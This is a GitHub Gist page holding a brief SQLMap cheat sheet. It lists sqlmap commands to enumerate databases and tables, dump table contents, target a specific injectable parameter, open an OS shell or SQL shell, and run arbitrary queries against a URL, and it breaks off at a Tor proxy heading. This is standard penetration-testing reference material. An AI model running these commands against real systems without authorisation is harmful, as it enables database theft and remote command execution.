Created
February 6, 2021 14:10
-
-
Save korrosivesec/bb7c29f0a240098544dfc5c2294f28a8 to your computer and use it in GitHub Desktop.
[SQLMap CheatSheet]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enumerate databases | |
| sqlmap --dbms=mysql -u "$URL" --dbs | |
| # Enumerate tables | |
| sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables | |
| # Dump table data | |
| sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump | |
| # Specify parameter to exploit | |
| sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2 | |
| # Specify parameter to exploit in 'nice' URIs | |
| sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1 | |
| # Get OS shell | |
| sqlmap --dbms=mysql -u "$URL" --os-shell | |
| # Get SQL shell | |
| sqlmap --dbms=mysql -u "$URL" --sql-shell | |
| # SQL query | |
| sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;" | |
| # Use Tor Socks5 proxy |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment